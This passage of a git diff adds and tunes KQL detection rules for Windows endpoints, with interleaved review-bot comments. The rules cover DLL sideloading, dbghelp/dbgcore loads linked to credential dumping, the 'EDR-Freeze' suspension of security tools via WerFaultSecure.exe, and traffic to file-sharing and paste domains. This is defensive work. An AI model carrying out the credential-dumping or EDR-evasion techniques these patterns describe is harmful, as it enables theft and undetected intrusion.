FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith 
"\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith 
"\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or 
FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith 
"\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith 
"\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith 
"\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith 
"\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\") or (FolderPath startswith "C:\\Windows\\Temp\\" and (InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and (InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\arm64" or InitiatingProcessFolderPath startswith "C:\\Windows\\UUS\\arm64\\"))))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath 
startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
index dd9a9245..8b175607 100644
--- a/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
+++ b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
@@ -7,4 +7,4 @@
 // Tags: attack.defense-evasion, attack.impact, attack.t1490
 
 DeviceImageLoadEvents
-| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp")))
\ No newline at end of file
+| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\Scratch\\")))
\ No newline at end of file
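Review bot: The new exclusion `InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\Scratch\\"` is added without any record of why: the hunk's context goes straight from `// Tags:` to the blank line and `DeviceImageLoadEvents`, so the rule appears to have no `// False Positives:` section (the rest of the header is outside the hunk). Presumably this is the Windows Recovery Environment agent's scratch area used during feature updates; an entry like `// - WinRE agent / Windows update components executing from C:\$WinREAgent\Scratch\ during upgrades` would give the next maintainer the basis for the tuning. Because the filter keys only on the initiating process path, any process executing from that directory is exempted regardless of which module it loads, which is worth stating alongside the entry so the trade-off is explicit.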
diff --git a/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql
new file mode 100644
index 00000000..598ad00e
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: high
+// Description: Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.
+// These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Possibly during software installation or update processes
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and (InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\$Recycle.Bin\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Documents\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\inetpub\\wwwroot\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Start Menu\\Programs\\Startup\\" or InitiatingProcessFolderPath contains "\\Users\\Default\\" or InitiatingProcessFolderPath contains "\\Videos\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql
new file mode 100644
index 00000000..1ed73a09
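Review bot: The `+// Description:` line says the DLLs are loaded "from uncommon locations", but the query constrains only `InitiatingProcessFolderPath`; `FolderPath` is matched by `endswith` alone, so a process running from `\Downloads\` that loads the system copy of dbghelp.dll matches, while a copy of the DLL placed under `\Downloads\` and loaded by a process elsewhere does not. Suggest rewording to `// Description: Detects a process executing from an uncommon location (such as user directories) loading dbgcore.dll or dbghelp.dll.` so analysts triage the initiating process rather than the DLL path. With `Level: high` and `\\Desktop\\`, `\\Documents\\` and `\\Downloads\\` in the list, the `// False Positives:` entry could also name user-launched installers and self-updating applications explicitly, since the existing entry only hints at them.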
--- /dev/null
+++ b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql
@@ -0,0 +1,13 @@
+// Title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: medium
+// Description: Detects WerFaultSecure.exe loading dbgcore.dll or dbghelp.dll which contains the MiniDumpWriteDump function.
+// The MiniDumpWriteDump function creates a minidump of a process by suspending all threads in the target process to ensure a consistent memory snapshot.
+// The EDR-Freeze technique abuses WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to suspend EDR/AV processes.
+// By leveraging MiniDumpWriteDump's thread suspension behavior, edr-freeze allows malicious activity to execute undetected during the suspension period.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and InitiatingProcessFolderPath endswith "\\WerFaultSecure.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql
index 56bf5a65..07306e40 100644
--- a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql
+++ b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql
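Review bot: The new rule carries no `// False Positives:` section, unlike the sibling dbgcore/dbghelp rule added in this commit, and it matches `\\WerFaultSecure.exe` regardless of where it executes from, including its legitimate system location. If WerFaultSecure.exe loads these DLLs while producing crash dumps of protected processes as part of normal Windows Error Reporting, the rule will fire on that activity too; I cannot tell from the hunk how frequent that is. Suggest adding `// False Positives:` followed by `// - Legitimate Windows Error Reporting dumps of protected processes by WerFaultSecure.exe; review the initiating command line and the dumped process before escalating` so the `Level: medium` rating has a documented basis.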
@@ -6,9 +6,10 @@
 // MITRE Tactic: Defense Evasion
 // Tags: attack.defense-evasion, attack.t1220
 // False Positives:
-// - The command wmic os get lastboottuptime loads vbscript.dll
+// - The command wmic os get lastbootuptime loads vbscript.dll
 // - The command wmic os get locale loads vbscript.dll
 // - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
+// - The command `wmic ntevent` loads vbscript.dll
 
 DeviceImageLoadEvents
 | where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
index bdc3d740..788867e1 100644
--- a/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
+++ b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql
@@ -9,4 +9,4 @@
 // - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.
 
 DeviceNetworkEvents
-| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\")
\ No newline at end of file
+| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
index b45c7855..4594e5e1 100644
--- a/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql
